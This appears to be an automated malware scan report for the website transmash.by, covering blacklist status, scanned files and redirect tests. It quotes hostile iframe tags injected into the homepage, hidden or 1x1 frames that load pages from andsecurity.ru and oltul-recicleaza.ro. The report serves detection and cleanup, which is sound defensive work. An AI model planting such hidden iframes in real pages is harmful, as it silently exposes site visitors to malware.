Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=transmash.by
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://transmash.by/ | 200 OK Content-Length: 35292 Content-Type: text/html | malicious |
Page code contains blacklisted domain: oltul-recicleaza.ro <iframe src="http://andsecurity.ru/1.html"width="0"></iframe> <br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /home/transmas/public_html/index.php:2) in <b>/home/transmas/public_html/libraries/joomla/session/session.php</b> on line <b>423</b><br /> ...[4435 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://oltul-recicleaza.ro/wp-content/themes/oltul/rjlo.php This URL is marked by Google as suspicious <iframe src="http://oltul-recicleaza.ro/wp-content/themes/oltul/rjlo.php" width="1" height="1" frameborder="0"> Hidden iFrame found. size: 0x src: http://andsecurity.ru/1.html <iframe src="http://andsecurity.ru/1.html"width="0"> | ||
http://transmash.by/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://informer.gismeteo.ru/html/js/showtlist_new.js | 200 OK Content-Length: 4660 Content-Type: application/x-javascript | clean |
http://informer.gismeteo.ru/html/js/ldata_new.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://informer.gismeteo.ru/html/2.php?tnumber=1&city0=4248%D0%9C%D0%B8%D0%BD%D1%81%D0%BA&codepg=utf-8&par=4&inflang=rus&domain=ru&vieinf=1&p=1&w=1&tblstl=gmtbl&tdttlstl=gmtdttl&tdtext=gmtdtext&new_scheme=1 | 200 OK Content-Length: 240 Content-Type: text/html | clean |
http://informer.gismeteo.ru/test404page.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: transmash.by
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 02:48:29 GMT
Server: nginx/1.4.4
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: transmash.by
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Sep 2014 02:48:29 GMT
Server: nginx/1.4.4
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: transmash.by
Referer: http://www.google.com/search?q=transmash.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: transmash.by
Referer: http://www.google.com/search?q=transmash.by
Result:
The result is similar to the first query. There are no suspicious redirects found.